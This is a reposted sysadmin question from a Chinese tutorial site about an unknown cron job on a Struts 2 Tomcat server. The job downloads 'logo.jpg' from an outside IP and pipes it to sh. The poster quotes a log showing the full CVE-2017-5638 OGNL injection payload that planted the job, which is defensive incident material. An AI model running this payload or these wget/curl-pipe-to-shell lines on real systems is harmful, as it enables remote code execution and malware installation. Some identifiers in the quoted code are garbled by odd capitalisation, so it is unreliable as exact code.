大佬教程收集整理的这篇文章主要介绍了linux – 通过未知来源的cron对Apache服务器进行Shell脚本攻击,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
[root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh
下载的logo.jpg有一个正在下载恶意软件的sHell脚本.
我在下面的网站上发现了类似的问题
https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/
和
https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux
我想知道有谁遇到过这个问题?
以及如何在代码中查找调度程序的来源.
注意:
我正在研究JAVA(Struts 2)jsp javascript jquery web项目.
每次我使用项目的war文件启动我的tomcat时,此调度程序都在运行,但我无法在我的代码中找到任何调度程序的调度程序.
我在日志文件中找到了以下行
[INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - Unable to find 'struts.multipart.saveDir' property setTing. DefaulTing to javax.servlet.context.tempdir [DEBUG] 2017-06-02 17:00:41,565 org.apache.struts2.dispatcher.Dispatcher debug - saveDir=/opt/tomcat/work/Catalina/localhost/MyApplication [WARN] 2017-06-02 17:00:41,572 org.apache.struts2.dispatcher.multipart.JakartaMultiPartrequest warn - Unable to parse request org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream,content type header is %{(#_='multipart/form-data').(#dm=@ognl.ognlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm): ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.geTinstance(@com.opensymphony.xwork2.ognl.ognlUtil@class)). (#ognlUtil.getExcludedPackagenames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))). (#cmd='echo "*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh\n*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh" | crontab -'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). (#cmds=(#iswin?{'cmd.exe','/c',#cmD}:{'/bin/bash','-c',#cmD})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())). (@org.apache.commons.io.IoUtils@copy(#process.geTinputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908) at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331) at org.apache.commons.fileupload.FileUploadBase.parserequest(FileUploadBase.java:351) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartrequest.parserequest(JakartaMultiPartrequest.java:189) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartrequest.processUpload(JakartaMultiPartrequest.java:127) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartrequest.parse(JakartaMultiPartrequest.java:92) at org.apache.struts2.dispatcher.multipart.MultiPartrequestWrapper.<init>(MultiPartrequestWrapper.java:81) at org.apache.struts2.dispatcher.Dispatcher.wraprequest(Dispatcher.java:779) at org.apache.struts2.dispatcher.ng.PrepareOperations.wraprequest(PrepareOperations.java:134) at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:478) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:80) at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:624) at org.apache.catalina.core.StandardENGIneValve.invoke(StandardENGIneValve.java:87) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342) at org.apache.coyote.http11.http11Processor.service(http11Processor.java:799) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:861) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1455) at org.apache.tomcat.util.net.socketProcessorBase.run(SocketProcessorBase.java:49) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) [DEBUG] 2017-06-02 17:00:41,574 org.apache.struts2.dispatcher.multipart.JakartaMultiPartrequest debug - Preparing error message for key: [struts.messageS.Upload.error.InvalidContentTypeException] [DEBUG] 2017-06-02 17:00:41,587 com.opensymphony.xwork2.conversion.impl.InstantiaTingNullHandler debug - Entering nullPropertyValue [target=[com.opensymphony.xwork2.DefaultTextProvider@6e817b9a],property=struts] [DEBUG] 2017-06-02 17:00:41,625 com.opensymphony.xwork2.conversion.impl.InstantiaTingNullHandler debug - Entering nullMethodResult
一些额外的链接:
> New Struts2 Remote Code Execution exploit caught in the wild.
> CVE-2017-5638 – Apache Struts2 S2-045
以上是大佬教程为你收集整理的linux – 通过未知来源的cron对Apache服务器进行Shell脚本攻击全部内容,希望文章能够帮你解决linux – 通过未知来源的cron对Apache服务器进行Shell脚本攻击所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。